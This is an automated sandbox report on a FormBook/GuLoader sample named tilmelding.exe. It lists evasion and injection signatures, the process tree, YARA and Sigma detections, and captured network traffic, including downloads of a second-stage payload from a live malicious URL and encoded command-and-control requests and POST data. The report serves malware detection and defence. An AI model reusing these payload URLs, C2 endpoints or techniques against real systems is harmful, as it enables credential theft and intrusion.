Loading ...

Play interactive tourEdit tour

Analysis Report tilmelding.bin

Overview

General Information

Sample Name:tilmelding.bin (renamed file extension from bin to exe)
MD5:8d41f4a492017be7c529a1630e3906f8
SHA1:bcb6a48903d6f8eafe41c4ed68d2986201c96d44
SHA256:27b805e1ceddb91ebec39349aa21ea5619c84e4c6ef3eb439b8156d66813e13e

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Potential malicious icon found
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contain functionality to detect virtual machines
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Deletes itself after installation
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: File Created with System Process Name
Sigma detected: Suspicious Svchost Process
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to resolve many domain names, but no domain seems valid
Tries to steal Mail credentials (via file access)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7
  • tilmelding.exe (PID: 2184 cmdline: 'C:\Users\user\Desktop\tilmelding.exe' MD5: 8D41F4A492017BE7C529A1630E3906F8)
    • tilmelding.exe (PID: 2144 cmdline: 'C:\Users\user\Desktop\tilmelding.exe' MD5: 8D41F4A492017BE7C529A1630E3906F8)
      • explorer.exe (PID: 1216 cmdline: MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
        • wininit.exe (PID: 764 cmdline: C:\Windows\System32\wininit.exe MD5: B5C5DCAD3899512020D135600129D665)
          • cmd.exe (PID: 2272 cmdline: /c del 'C:\Users\user\Desktop\tilmelding.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
          • firefox.exe (PID: 2468 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: 594F91C5985AC402ECD2D7F1376AFFFD)
        • gdiddfh.exe (PID: 2456 cmdline: C:\Program Files\A_hh\gdiddfh.exe MD5: 8D41F4A492017BE7C529A1630E3906F8)
          • gdiddfh.exe (PID: 2428 cmdline: C:\Program Files\A_hh\gdiddfh.exe MD5: 8D41F4A492017BE7C529A1630E3906F8)
        • gdiddfh.exe (PID: 2464 cmdline: 'C:\Program Files\A_hh\gdiddfh.exe' MD5: 8D41F4A492017BE7C529A1630E3906F8)
          • gdiddfh.exe (PID: 2472 cmdline: 'C:\Program Files\A_hh\gdiddfh.exe' MD5: 8D41F4A492017BE7C529A1630E3906F8)
        • cmd.exe (PID: 2628 cmdline: C:\Windows\System32\cmd.exe MD5: AD7B9C14083B52BC532FBA5948342B98)
        • svchost.exe (PID: 2604 cmdline: C:\Windows\System32\svchost.exe MD5: 54A47F6B5E09A77E61649109C6A08866)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.1542166839.00060000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000E.00000002.1542166839.00060000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18429:$sqlite3step: 68 34 1C 7B E1
    • 0x1853c:$sqlite3step: 68 34 1C 7B E1
    • 0x18458:$sqlite3text: 68 38 2A 90 C5
    • 0x1857d:$sqlite3text: 68 38 2A 90 C5
    • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
    0000000E.00000002.1542166839.00060000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.972877860.1D9D0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.972877860.1D9D0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18429:$sqlite3step: 68 34 1C 7B E1
      • 0x1853c:$sqlite3step: 68 34 1C 7B E1
      • 0x18458:$sqlite3text: 68 38 2A 90 C5
      • 0x1857d:$sqlite3text: 68 38 2A 90 C5
      • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 43 entries

      Sigma Overview


      System Summary:

      barindex
      Sigma detected: File Created with System Process NameShow sources
      Source: File createdAuthor: Sander Wiebing: Data: EventID: 11, Image: C:\Windows\explorer.exe, ProcessId: 1216, TargetFilename: C:\Users\user\AppData\Local\Temp\A_hh
      Sigma detected: Suspicious Svchost ProcessShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\svchost.exe, CommandLine: C:\Windows\System32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1216, ProcessCommandLine: C:\Windows\System32\svchost.exe, ProcessId: 2604
      Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\wininit.exe, CommandLine: C:\Windows\System32\wininit.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wininit.exe, NewProcessName: C:\Windows\System32\wininit.exe, OriginalFileName: C:\Windows\System32\wininit.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1216, ProcessCommandLine: C:\Windows\System32\wininit.exe, ProcessId: 764

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Antivirus / Scanner detection for submitted sampleShow sources
      Source: tilmelding.exeAvira: detected
      Antivirus detection for URL or domainShow sources
      Source: http://ukaimc.webredirect.org/uploud/5bab0b1d864615bab0b1d864b3/bin_AVQtU222.bin~J9tAvira URL Cloud: Label: phishing
      Source: http://ukaimc.webredirect.org/uploud/5bab0b1d864615bab0b1d864b3/bin_AVQtU222.binAvira URL Cloud: Label: phishing
      Source: http://ukaimc.webredirect.org/uploud/5bab0b1d864615bab0b1d864b3/bin_AVQtU222.binSJ9YAvira URL Cloud: Label: phishing
      Antivirus detection for dropped fileShow sources
      Source: C:\Program Files\A_hh\gdiddfh.exeAvira: detection malicious, Label: HEUR/AGEN.1046816
      Source: C:\Program Files\A_hh\gdiddfh.exeAvira: detection malicious, Label: HEUR/AGEN.1046816
      Multi AV Scanner detection for domain / URLShow sources
      Source: ukaimc.webredirect.orgVirustotal: Detection: 7%Perma Link
      Source: http://ukaimc.webredirect.org/uploud/5bab0b1d864615bab0b1d864b3/bin_AVQtU222.binVirustotal: Detection: 13%Perma Link
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Program Files\A_hh\gdiddfh.exeVirustotal: Detection: 26%Perma Link
      Source: C:\Program Files\A_hh\gdiddfh.exeReversingLabs: Detection: 63%
      Source: C:\Users\user\AppData\Local\Temp\A_hh\gdiddfh.exeVirustotal: Detection: 26%Perma Link
      Source: C:\Users\user\AppData\Local\Temp\A_hh\gdiddfh.exeReversingLabs: Detection: 63%
      Multi AV Scanner detection for submitted fileShow sources
      Source: tilmelding.exeVirustotal: Detection: 26%Perma Link
      Source: tilmelding.exeReversingLabs: Detection: 63%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000E.00000002.1542166839.00060000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.972877860.1D9D0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.1539233364.00030000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.1539422251.00060000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1390601976.00060000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.2702578042.03C20000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.1523518068.00030000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.970738080.006A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.2696183744.001D0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.2695859455.00060000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.1523696414.00060000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.2696313938.00200000.00000004.00000001.sdmp, type: MEMORY
      Machine Learning detection for dropped fileShow sources
      Source: C:\Program Files\A_hh\gdiddfh.exeJoe Sandbox ML: detected
      Source: C:\Program Files\A_hh\gdiddfh.exeJoe Sandbox ML: detected
      Machine Learning detection for sampleShow sources
      Source: tilmelding.exeJoe Sandbox ML: detected

      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 4x nop then lea edx, dword ptr [ebp-1Ch]1_2_1EAB1E4C
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then pop esi7_2_000FA040
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then pop edi7_2_000F136A
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then pop edi7_2_000F1370
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then pop edi7_2_000F94E0
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then pop edi7_2_000FADA5
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then pop edi7_2_000FA630
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then pop ebx7_2_000EA6B0
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then pop edi7_2_000FA7E9
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then pop edi7_2_000FA7E7
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 4x nop then jmp 1EBC7098h10_2_1EBC7072
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 4x nop then jmp 1EC4B9BEh10_2_1EBB45E6

      Networking:

      barindex
      Tries to resolve many domain names, but no domain seems validShow sources
      Source: unknownDNS traffic detected: query: www.faketaxiholland.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.pensah.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.easyamazonmail.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.draconiandiesel.info replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.midlandtxcandles.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.xn--24tw29b3pc.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.thecoffeecup.kiwi replaycode: Server failure (2)
      Source: unknownDNS traffic detected: query: www.campingcasa.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.villanuevacommunications.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.ggqrcm.online replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.maikanetaka.com replaycode: Name error (3)
      Source: global trafficHTTP traffic detected: GET /kkx/?3fF8Bb=64Wxmnii3CxZo/YKiPSrrakJx+HPrnC+CLK+DCPODnQVNwq5cbSMGcyAEB+S8UKNrGkEIw==&6ly=zBcTivvxRzCL HTTP/1.1Host: www.atechels.netConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kkx/?3fF8Bb=q34/tD3k/u0ytkg25vVqgsFDW38QMsYC4CmmiU0dT4dFpHI6Od9O4assWqG75Uh3xGYd1A==&6ly=zBcTivvxRzCL&sql=1 HTTP/1.1Host: www.therichnurse.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kkx/?3fF8Bb=an/3nFwlmuh8GBUGJOd9Y7dWGi7RXgMeqzUW/F2v8zHWXFzxfnYdysIE9cWJg/gbYSIETQ==&6ly=zBcTivvxRzCL&sql=1 HTTP/1.1Host: www.comoganhodinheiro.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kkx/?3fF8Bb=aeqXfN2ZigXkOYDZmATYag0CPCLp2roYAEKzfhOPm+Vqc/Rfg767hk4JLxOZzpDt5TsoOA==&6ly=zBcTivvxRzCL HTTP/1.1Host: www.yofdyk.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kkx/?3fF8Bb=HE7hqJBNBdh2+WJ10mmwHGZYBK3+xqVMGaOARpHbjj4G+yedevSk31LHSlD49+RkwpbDRg==&6ly=zBcTivvxRzCL HTTP/1.1Host: www.livetruntknutenblogg.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kkx/?3fF8Bb=64Wxmnii3CxZo/YKiPSrrakJx+HPrnC+CLK+DCPODnQVNwq5cbSMGcyAEB+S8UKNrGkEIw==&6ly=zBcTivvxRzCL HTTP/1.1Host: www.atechels.netConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 205.178.189.131 205.178.189.131
      Source: Joe Sandbox ViewASN Name: unknown unknown
      Source: Joe Sandbox ViewASN Name: unknown unknown
      Source: Joe Sandbox ViewASN Name: unknown unknown
      Source: Joe Sandbox ViewASN Name: unknown unknown
      Source: Joe Sandbox ViewASN Name: unknown unknown
      Source: global trafficHTTP traffic detected: GET /uploud/5bab0b1d864615bab0b1d864b3/bin_AVQtU222.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ukaimc.webredirect.orgCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /kkx/?3fF8Bb=64Wxmnii3CxZo/YKiPSrrakJx+HPrnC+CLK+DCPODnQVNwq5cbSMGcyAEB+S8UKNrGkEIw==&6ly=zBcTivvxRzCL HTTP/1.1Host: www.atechels.netConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /uploud/5bab0b1d864615bab0b1d864b3/bin_AVQtU222.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ukaimc.webredirect.orgCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /uploud/5bab0b1d864615bab0b1d864b3/bin_AVQtU222.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ukaimc.webredirect.orgCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /kkx/?3fF8Bb=q34/tD3k/u0ytkg25vVqgsFDW38QMsYC4CmmiU0dT4dFpHI6Od9O4assWqG75Uh3xGYd1A==&6ly=zBcTivvxRzCL&sql=1 HTTP/1.1Host: www.therichnurse.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kkx/?3fF8Bb=an/3nFwlmuh8GBUGJOd9Y7dWGi7RXgMeqzUW/F2v8zHWXFzxfnYdysIE9cWJg/gbYSIETQ==&6ly=zBcTivvxRzCL&sql=1 HTTP/1.1Host: www.comoganhodinheiro.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kkx/?3fF8Bb=aeqXfN2ZigXkOYDZmATYag0CPCLp2roYAEKzfhOPm+Vqc/Rfg767hk4JLxOZzpDt5TsoOA==&6ly=zBcTivvxRzCL HTTP/1.1Host: www.yofdyk.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kkx/?3fF8Bb=HE7hqJBNBdh2+WJ10mmwHGZYBK3+xqVMGaOARpHbjj4G+yedevSk31LHSlD49+RkwpbDRg==&6ly=zBcTivvxRzCL HTTP/1.1Host: www.livetruntknutenblogg.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kkx/?3fF8Bb=64Wxmnii3CxZo/YKiPSrrakJx+HPrnC+CLK+DCPODnQVNwq5cbSMGcyAEB+S8UKNrGkEIw==&6ly=zBcTivvxRzCL HTTP/1.1Host: www.atechels.netConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
      Source: unknownDNS traffic detected: queries for: ukaimc.webredirect.org
      Source: unknownHTTP traffic detected: POST /kkx/ HTTP/1.1Host: www.therichnurse.comConnection: closeContent-Length: 163360Cache-Control: no-cacheOrigin: http://www.therichnurse.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.therichnurse.com/kkx/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 46 38 42 62 3d 69 56 30 46 7a 6e 61 55 69 4f 45 46 6e 7a 77 62 69 72 52 30 79 6f 39 5f 56 53 4e 42 4e 34 63 53 6c 46 7a 31 6a 48 59 65 57 70 74 77 68 33 38 74 49 4f 78 63 69 65 46 43 56 65 4b 37 78 30 63 38 37 57 77 4a 37 73 64 54 30 38 77 78 4b 6a 43 52 75 6f 42 44 28 62 41 4b 6e 35 45 41 70 64 58 35 77 58 48 6c 51 6c 6b 53 78 4f 30 42 47 51 77 30 33 59 66 6f 4b 49 41 73 42 48 77 4b 44 33 37 57 55 36 64 5f 5a 67 45 48 62 4a 4a 70 37 2d 49 68 52 4d 76 4c 75 4b 56 62 61 74 73 31 6e 57 6c 68 77 63 47 41 61 36 44 63 56 69 55 52 6a 42 75 44 43 57 45 34 44 41 6a 59 6d 41 77 78 67 44 4c 42 68 61 7a 33 44 6b 67 50 42 4a 72 4b 59 69 73 75 47 5f 7a 39 71 4f 30 37 44 79 38 35 35 50 30 37 48 6c 4c 78 30 45 67 58 59 70 44 70 75 6d 6c 53 77 5f 76 4c 78 5f 75 6f 6a 42 32 79 51 38 61 49 6e 4a 35 34 59 37 52 52 28 32 33 4c 30 64 70 5f 68 76 36 68 58 32 73 45 5a 78 4b 70 45 33 28 6f 79 6c 58 39 6d 67 69 37 49 4a 48 35 4b 5a 78 59 7e 6f 32 4a 64 4f 71 6d 50 2d 73 51 41 4b 48 48 39 6e 4c 67 65 30 49 52 4f 51 6b 6f 45 4d 7e 75 7e 35 4b 49 52 37 34 47 41 38 6a 6e 77 30 62 59 7e 5f 7a 35 57 5f 77 53 4d 31 6e 7a 56 58 5a 31 31 77 57 49 6c 33 4e 62 76 59 58 78 75 54 59 37 71 41 50 6d 39 73 67 74 6c 4d 71 6a 51 5f 76 77 58 70 51 71 43 35 46 6c 42 6f 62 50 57 4a 43 5a 53 52 4e 39 32 63 78 30 43 55 30 50 76 6b 33 42 68 31 31 58 37 30 7e 31 67 59 61 64 78 64 4d 76 4a 45 54 76 4c 41 48 72 47 38 7e 46 57 4a 7e 6e 57 4f 4c 6e 6e 2d 7a 55 6f 6a 41 32 70 6d 49 41 6d 52 6c 5f 32 67 72 36 69 4b 31 56 36 51 37 37 71 7a 63 50 73 32 4d 52 64 39 63 7a 71 77 61 65 71 56 70 30 71 77 54 51 56 66 52 47 51 6b 4d 5a 7a 70 6d 38 74 32 42 62 43 65 79 49 39 41 67 5f 66 41 73 46 76 6d 4e 5a 56 38 50 79 4c 49 49 4f 7e 7a 69 61 63 35 51 45 59 47 65 4d 28 37 4d 51 39 6c 69 71 51 37 48 4d 51 57 28 71 72 48 5a 69 47 63 63 31 37 64 63 75 35 34 73 48 6f 47 57 6d 36 7a 28 58 4b 43 5a 39 77 73 77 71 6d 2d 30 61 67 7a 62 68 4f 47 39 79 62 2d 6c 37 6d 43 49 69 6c 63 63 57 67 66 73 37 77 70 55 4e 51 41 6c 47 38 72 46 48 78 64 63 38 32 57 64 49 78 4b 75 6a 6c 6b 35 45 74 69 51 6c 6a 56 46 58 37 67 65 53 69 41 46 47 6c 77 56 6f 39 68 4e 52 35 4e 74 77 42 31 63 59 70 4a 28 67 44 6b 7a 53 30 75 31 66 72 66 6e 69 72 43 77 6f 4a 6a 65 41 52 50 67 52 69 77 32 2d 79 63 5a 55 6d 64 57 74 68 42 45 48 58 42 39 55 51 6a 78 45 6f 42 53 5a 68 7a 52 47 52 31 4b 70 67 76 72 43 52 5a 38 48 4c 51 34 6d 6a 75 50 5f 53 33 75 6f 71 36 4e 30 41 30 79 56 30 54 4d 36 63 6f 6f 30 5a 31 74 63 53 6e 50 43 48 6a 6d 30 56 72 45 35 69 46 52 42 64 68 7e 51 46 79 66 4a 4f 4b 51 48 64 5a 43 34 44 4f 32 59 69 6f 28 6e 6f 61 6e 41 49 66 53 4a
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 May 2020 05:58:50 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 327Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6b 6b 78 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /kkx/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
      Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
      Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
      Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
      Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0B
      Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0C
      Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0N
      Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.thawte.com0
      Source: wininit.exe, 00000004.00000002.2697877520.01DDF000.00000004.00000001.sdmp, firefox.exe, 00000007.00000002.1390761279.0091F000.00000004.00000001.sdmpString found in binary or memory: http://power.networksolutions.com/index.html
      Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
      Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
      Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
      Source: tilmelding.exe, 00000001.00000002.969385138.00150000.00000040.00000001.sdmp, gdiddfh.exe, 0000000A.00000002.1523937546.00150000.00000040.00000001.sdmp, gdiddfh.exe, 0000000B.00000002.1539610673.00150000.00000040.00000001.sdmpString found in binary or memory: http://ukaimc.webredirect.org/uploud/5bab0b1d864615bab0b1d864b3/bin_AVQtU222.bin
      Source: gdiddfh.exe, 0000000B.00000002.1539666819.00293000.00000004.00000020.sdmpString found in binary or memory: http://ukaimc.webredirect.org/uploud/5bab0b1d864615bab0b1d864b3/bin_AVQtU222.binSJ9Y
      Source: gdiddfh.exe, 0000000B.00000002.1539666819.00293000.00000004.00000020.sdmpString found in binary or memory: http://ukaimc.webredirect.org/uploud/5bab0b1d864615bab0b1d864b3/bin_AVQtU222.bin~J9t
      Source: explorer.exe, 00000003.00000000.943386693.03A10000.00000008.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
      Source: explorer.exe, 00000003.00000002.2698822615.01ED0000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.comPA
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.atechels.net
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.atechels.net/kkx/
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.atechels.net/kkx/www.midlandtxcandles.com
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.atechels.netReferer:
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.campingcasa.com
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.campingcasa.com/kkx/
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.campingcasa.com/kkx/www.ggqrcm.online
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.campingcasa.comReferer:
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.comoganhodinheiro.com
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.comoganhodinheiro.com/kkx/
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.comoganhodinheiro.com/kkx/www.yofdyk.com
